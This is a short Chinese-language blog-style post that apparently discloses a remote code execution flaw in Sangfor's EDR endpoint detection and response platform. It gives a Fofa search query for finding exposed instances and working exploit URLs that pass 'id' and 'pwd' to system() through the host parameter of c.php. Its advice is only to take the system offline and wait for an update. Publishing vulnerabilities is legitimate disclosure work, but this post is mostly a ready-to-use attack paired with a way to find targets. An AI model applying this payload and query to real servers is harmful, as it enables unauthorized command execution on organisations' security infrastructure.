深信服 EDR终端检测响应平台 0day RCE 漏洞

0x01 介绍

深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。

官网的原话。。。

Fofa关键字:

title=“终端检测响应平台”

界面:

image-20200817232926734

0x02 RCE payload

漏洞位置:host 参数

1
https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=id

image-20200817233053115

1
https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=pwd

image-20200817235107599

0x03 处置建议

目前官方未公布相关处置建议,临时处置可采取:

先下线吧,代码漏洞有点多。。
等更新